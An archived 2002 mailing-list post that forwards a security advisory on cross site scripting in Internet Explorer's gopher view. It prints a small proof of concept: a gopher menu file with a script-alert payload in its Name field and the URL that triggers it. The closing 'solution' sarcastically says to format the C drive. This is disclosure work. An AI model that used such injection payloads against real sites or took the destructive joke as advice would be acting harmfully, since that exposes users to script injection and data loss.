[Fwd: IE gopher cross site scripting]
From: KF (dotslashat_private)
Date: Sun Jun 16 2002 - 20:17:19 PDT
Next message: pr0ix: "Re: openbse rumours"
Not sure why but I can't seem to get this message through to the lists...
-KF
attached mail follows:
======================================================================
Strategic Reconnaissance Team Security Advisory (SRT2002-06-16-0314)
Topic : IE gopher view Cross Site Scripting
Date : June 16, 2002
Credit : KF dotslash[at]snosoft.com
Site : http://www.snosoft.com
======================================================================
.: Description:
---------------
Internet Explorer 5 (and others?) allow cross site scripting in gopher
view. This is currently the lease of your worries with gopher but it
may still pose a threat.
.: Impact:
----------
The usual cross site scripting attack consequences are subject here.
Your script must fit into a finite amount of character space or it
will be truncated thus making it fail.
In order to duplicate this attack I used gn gohperd on my linux box.
I made a malicious .cache file as shown below in order to to exploit
the browser.
[root@localhost dir]# cat menu
Name=<script>alert('When can we see the source code bill?')</script>
Path=0/hrmm
Type=0
Host=10.0.1.234
Port=70
[root@localhost dir]# /root/gn-2.25-DEV/mkcache/mkcache
Warning: Unable to open mime type file:
/path/to/src/mkcache/gn_mime.types
Using defaults.
Writing cache file ./.cache
next open the link gopher://10.0.1.234/1
viola javascript alert with extra cheese.
.: Systems Affected:
--------------------
Microsoft based machines with unknown versions of IExplorer.
.: Solution:
------------
Step 1.) Ask your vendor for the source code so that you can make your
own patch. Oh wait that would make you an "open source terrorist".
Step 2.) In the event that step one fails please format your c drive.
======================================================================
-KF
This archive was generated by hypermail 2b30
: Mon Jun 17 2002 - 09:05:02 PDT